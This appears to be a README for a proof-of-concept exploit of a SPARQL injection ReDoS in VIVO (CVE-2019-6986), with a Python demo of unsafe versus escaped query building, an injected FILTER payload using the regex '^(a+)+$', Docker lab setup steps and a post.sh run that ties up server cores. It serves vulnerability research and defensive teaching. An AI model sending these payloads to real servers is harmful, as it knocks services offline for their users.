This directory contains a proof-of-concept exploit for a SPARQL injection vulnerability in VIVO, assigned CVE-2019-6986. The exploit targets this line of code. It causes a denial of service by injecting a regular expression that suffers catastrophic backtracking (a ReDoS) into the SPARQL query VIVO generates, so that each malicious request keeps a server thread busy indefinitely.
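To make the bug class concrete, here is an added example in Python (not VIVO's code, and not the exploit in this directory): a query builder that splices user input straight into a SPARQL string literal, beside one that escapes the literal per the SPARQL 1.1 ECHAR rules, plus a small literal-aware scanner that shows whether a FILTER made it into the query as syntax or stayed inside the literal. The `rdfs:label` query, the `label` parameter and the payload shape are assumptions for illustration; VIVO's real endpoint and parameter are not reproduced here.

```python
"""SPARQL injection vs. literal escaping, plus a ReDoS near-miss demo.

Added example; assumptions: a hypothetical query template that binds
a user-supplied label, and an illustrative payload.  Nothing here is
VIVO's own code or the exact request sent by post.sh.
"""
import re
import time

# SPARQL 1.1 grammar: inside a quoted string literal only these escapes
# (ECHAR) are legal: \t \b \n \r \f \" \' \\ .  Escaping them keeps the
# input from terminating the literal and becoming query syntax.
_ECHAR = {
    "\\": "\\\\", '"': '\\"', "'": "\\'",
    "\n": "\\n", "\r": "\\r", "\t": "\\t", "\b": "\\b", "\f": "\\f",
}


def escape_literal(value: str) -> str:
    """Escape a Python string so it is safe inside a SPARQL "..." literal."""
    return "".join(_ECHAR.get(ch, ch) for ch in value)


def build_query_unsafe(label: str) -> str:
    """Vulnerable: raw concatenation (the bug class behind CVE-2019-6986)."""
    return 'SELECT ?s WHERE { ?s rdfs:label "' + label + '" }'


def build_query_escaped(label: str) -> str:
    """Hardened: the same query with the literal escaped."""
    return 'SELECT ?s WHERE { ?s rdfs:label "' + escape_literal(label) + '" }'


# Nested quantifiers backtrack exponentially on a near-miss input such as
# "aaaa...ab".  Inside a SPARQL FILTER this runs on the server per binding.
EVIL_REGEX = "^(a+)+$"

# Constructed payload: close the literal, add a FILTER with the evil regex,
# close the group pattern, and comment out the rest of the template.
PAYLOAD = 'x" FILTER regex(str(?s), "' + EVIL_REGEX + '") } #'


def strip_literals_and_comments(query: str) -> str:
    """Blank out string literals (honouring ECHAR escapes) and # comments,
    leaving only the parts of the query that the parser treats as syntax."""
    out, i, n = [], 0, len(query)
    while i < n:
        ch = query[i]
        if ch in ('"', "'"):
            quote = ch
            i += 1
            while i < n and query[i] != quote:
                i += 2 if query[i] == "\\" else 1  # skip an escaped char
            i += 1  # closing quote
            out.append(quote + quote)  # keep an empty literal as placeholder
        elif ch == "#":
            while i < n and query[i] != "\n":
                i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def count_filters(query: str) -> int:
    """Number of FILTER keywords that are real syntax (not inside literals)."""
    return len(re.findall(r"\bFILTER\b", strip_literals_and_comments(query), re.I))


def redos_seconds(n: int) -> float:
    """Time the evil regex against an n-character near-miss; grows ~2^n.
    Python's re engine backtracks like java.util.regex, so it shows the
    same blow-up.  Keep n small (<= 20) unless you want to wait."""
    subject = "a" * n + "b"
    start = time.perf_counter()
    assert re.match(EVIL_REGEX, subject) is None  # near-miss never matches
    return time.perf_counter() - start


if __name__ == "__main__":
    unsafe = build_query_unsafe(PAYLOAD)
    safe = build_query_escaped(PAYLOAD)
    print("unsafe :", unsafe, "-> filters:", count_filters(unsafe))
    print("escaped:", safe, "-> filters:", count_filters(safe))
    for n in (12, 16, 20):
        print(f"ReDoS n={n}: {redos_seconds(n):.3f}s")
```

Running the script prints the unsafe query with one live FILTER and the escaped query with none (the FILTER text is still present, but only as data inside the label literal), followed by timings that grow roughly 16x per four extra characters; that exponential growth, executed server-side, is what turns one request into a pinned CPU core.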
Create a docker network bridge, to simulate a network with two separate computers.
docker network create -d bridge --subnet 172.18.0.0/16 vivo-demo-network
Build the server docker image:
docker build vivo-server -t vivo-server --build-arg UID=`id -u`
Start the container:
docker run --rm --network vivo-demo-network --ip=172.18.0.10 -h vivo-server --publish 8000:8000 --publish 8080:8080 -i -t vivo-server
Inside the container, start VIVO.
sudo ./init_mysql.sh # password is: x
/usr/local/tomcat/bin/catalina.sh start
VIVO seems to take at least 10 minutes to initialize itself. You can monitor its progress in this log file:
/usr/local/tomcat/logs/vivo.all.log
VIVO isn't ready until you see lines like these at the bottom of vivo.all.log:
2019-01-17 22:19:31,004 INFO [IndexHistory] STARTUP, 1/17/19, 10:17 PM, []
2019-01-17 22:19:31,008 INFO [FreemarkerSetup] Freemarker templating system initialized.
2019-01-17 22:19:31,122 INFO [VClassGroupCache] VClassGroupCache added to context
2019-01-17 22:19:31,123 INFO [VClassGroupCache] VClassGroupCache set to listen to events from IndexBuilder
2019-01-17 22:19:31,126 INFO [StartupManager] Called 'contextInitialized' on all listeners.
2019-01-17 22:19:31,330 INFO [JSessionStripFilter] Filtering: no jsessionids will be generated.
At this point, you can check that VIVO is running by visiting http://127.0.0.1:8080/vivo in your browser. (We exposed port 8080 on the docker container.) To log in, the username is vivo_root@mydomain.edu and the password is rootPassword.
You can debug the application with Eclipse, even when it is running in docker. To do this you also need to bind port 8000 when you start the container. (This was already included in the docker run command above.)
Inside docker, start tomcat like this:
export JPDA_ADDRESS=0.0.0.0:8000
export JPDA_TRANSPORT=dt_socket
/usr/local/tomcat/bin/catalina.sh jpda start
Next you need to get the VIVO source code on the host machine and build it. The purpose of this is mainly to make Maven download all the dependencies so that Eclipse can resolve them.
git clone https://github.com/vivo-project/VIVO.git
git clone https://github.com/vivo-project/Vitro.git
cd VIVO/
mvn package -DskipTests
mvn eclipse:eclipse
Then import the VIVO and Vitro projects into Eclipse. Inside Eclipse, create a remote debug configuration connecting to localhost:8000 (the default).
Build the attacker docker image:
docker build vivo-attacker -t vivo-attacker
Start the container:
docker run --rm --network vivo-demo-network --ip=172.18.0.11 -h vivo-attacker -i -t vivo-attacker
Inside the container, use post.sh to send 8 malicious requests to VIVO.
./post.sh
The curl command inside post.sh uses a 1 second timeout and never receives a response from the VIVO server, so you will see 8 timeout error messages on the command line:
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
VIVO is now hogging 8 CPU cores: each request is still being evaluated on the server even though curl has given up waiting for it.